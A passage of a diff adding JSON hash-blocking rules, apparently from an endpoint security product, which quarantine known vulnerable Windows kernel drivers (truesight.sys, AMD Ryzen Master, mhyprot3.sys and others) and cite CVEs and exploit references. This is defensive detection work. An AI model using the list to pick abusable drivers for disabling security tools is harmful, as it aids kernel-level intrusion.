+}
+{
+ "id": "f1ddf1ca-6cf6-5487-8de0-8d7772d2f903",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.833480Z",
+ "creation_date": "2026-03-23T11:45:30.833483Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.833491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1d4a05d39bdc3085f6ad89d075e134de712d6d291a44d4a6917d49455b6f22e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1e310fe-9cd0-5be8-98e4-cbb974b7a281",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830455Z",
+ "creation_date": "2026-03-23T11:45:30.830458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830463Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2cb79703aca300534076b6a50ce979a0e2f7ef66b925d274d5f129d7326d2e4b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1e4fa9d-1398-5c6e-8044-ca2f4bca0ce5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830482Z",
+ "creation_date": "2026-03-23T11:45:31.830484Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830489Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "32407d25620fced3f4ab040008605cc3da0b35f54384b832563877912bc4fe67",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1e52fd2-25e6-5c40-a575-2fc6df4b5e91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984839Z",
+ "creation_date": "2026-03-23T11:45:29.984841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984847Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f43d977a5fb1bdc10837e7c4ff03526d2b8fa9757da9dd8bd6514cd31748a858",
+ "comment": "Dangerous Physmem Kernel Driver (aka AsrSmartConnectDrv.Sys) [https://www.loldrivers.io/drivers/57f63efb-dc43-4dba-9413-173e3e4be750/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1f798e3-a0f4-5563-9949-a5353781c4cf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975411Z",
+ "creation_date": "2026-03-23T11:45:29.975413Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975419Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0ad2d2fe1b16e42f43788dae1f0f45031b5025ef6bcc52360e18812820682f04",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f1fdd0f6-1d05-5427-bb5a-4376e86e88ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483992Z",
+ "creation_date": "2026-03-23T11:45:31.483996Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484006Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dfdb92dbe9139a155de234bbfa711b98fa3de517456d493a893416836bf6980e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2030bd3-093f-5ab6-aa1b-b4d8e042d93c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.478665Z",
+ "creation_date": "2026-03-23T11:45:30.478669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.478677Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e505569892551b2ba79d8792badff0a41faea033e8d8f85c3afea33463c70bd9",
+ "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f20cd15a-7bcf-55af-9382-34a1b17b6769",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816141Z",
+ "creation_date": "2026-03-23T11:45:31.816144Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816151Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4fe6fdcc1b3435a182e6f3425008f4db2a20154f76cb83745d202c30182c2e6a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f218ce3f-d1de-5d2b-ad06-1a52680b1759",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159211Z",
+ "creation_date": "2026-03-23T11:45:31.159213Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159218Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "915c0bc56291c65b9261e47b14a49ebbc08b7df4e05eb1905526950f263dc956",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f223c386-4424-5bd0-a34f-11a45c6bd7b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452124Z",
+ "creation_date": "2026-03-23T11:45:30.452128Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452138Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "292ada92cd442f78bfafe4098105c5e3f2427589f32ee5999d90b61c422fa445",
+ "comment": "Vulnerable Kernel Driver (aka VBoxUSBMon.sys) [https://www.loldrivers.io/drivers/babe348d-f160-41ec-9db9-2413b989c1f0/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f22a67df-fc5d-5eee-985c-b921e0511785",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823827Z",
+ "creation_date": "2026-03-23T11:45:30.823829Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823835Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2c0f60a05123a3c8fd93c8a3e8c1c276d1f0966b31f0981cf7c269098e0defb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f22b563e-1309-5632-acf9-2e8a89ba9d47",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452278Z",
+ "creation_date": "2026-03-23T11:45:30.452282Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452291Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91793baa79b630f452267c408cc7509f25aa7ac0e39e88576e3daed3dcd5d8e5",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f232cd25-ab49-5580-84ab-1317e112a45b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605082Z",
+ "creation_date": "2026-03-23T11:45:29.605084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a742196d6446e5178c3d46180d53889d962f3b1a19bc3439f71cc6ac7b15f430",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f2377ffe-c276-5a49-8f03-64e653f22ec0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146691Z",
+ "creation_date": "2026-03-23T11:45:31.146693Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146698Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8f7f051b49360911cb55e80b8f787582f2d9689f9b9dc19f47ca701acb8a6e1d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f24c4f57-0420-538a-b901-9176e64e3186",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982748Z",
+ "creation_date": "2026-03-23T11:45:29.982750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982755Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba",
+ "comment": "Vulnerable Kernel Driver (aka d4.sys) [https://www.loldrivers.io/drivers/c2e70ee6-2f13-4d43-ad5a-c2bf033cc457/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f25384b6-7caa-511e-8a30-f0b4dffabeab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479332Z", + "creation_date": "2026-03-23T11:45:30.479334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479340Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ae42c1f11a98dee07a0d7199f611699511f1fb95120fabc4c3c349c485467fe", + "comment": "Vulnerable Kernel Driver (aka AsrAutoChkUpdDrv_1_0_32.sys) [https://www.loldrivers.io/drivers/02e4a30f-8aa8-4ff0-8e02-1bff1d0f088f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f253c20a-a844-50cf-be15-e0eb8f1280d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974679Z", + "creation_date": "2026-03-23T11:45:29.974681Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974686Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "35a7be9b0cde8c3d409a472a320541df070d7af6008e6458a05947f2591da9b5", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f2545873-d660-5d71-8f71-8c8079b56d1e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489022Z", + "creation_date": "2026-03-23T11:45:31.489024Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489030Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "803753e083138c834cd826128e990ee00f45f3be01f1de93e800672e4b00209b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f25476cb-c961-5296-a938-571ac89b63dc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819481Z", + "creation_date": "2026-03-23T11:45:30.819483Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819488Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d008e636e74c846fe7c00f90089ff725561cb3d49ce3253f2bbfbc939bbfcb2", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f258fd4a-592b-5e68-89b7-96b87ec8025e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836338Z", + "creation_date": "2026-03-23T11:45:30.836342Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836348Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0589f6c3c50acf2e31b94c0b8a2813a77bb1706c9aa1ae0430417007028ca3ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f264824b-4d3a-5b15-b036-f336fa108edc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490120Z", + "creation_date": "2026-03-23T11:45:31.490122Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490127Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8ff77d20034c3b0e9bd85f352be45931df0e961373a47538d141339d5785ded", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f26b20bd-b63f-5e32-91b8-e2e89ba66add", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.147788Z", + "creation_date": "2026-03-23T11:45:31.147790Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147796Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c2d5e8cc34820d4627ec5a5c11f9faef59900ae8d5170d6f358e7c2b8a6b25a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f2710301-9527-595e-a5e1-08fa703c27da", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812434Z", + "creation_date": "2026-03-23T11:45:31.812436Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812442Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c03d1d6012201bb79d3f8ad1e34e984c9ba537ea8c4d94b935bbcbec0c029774", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 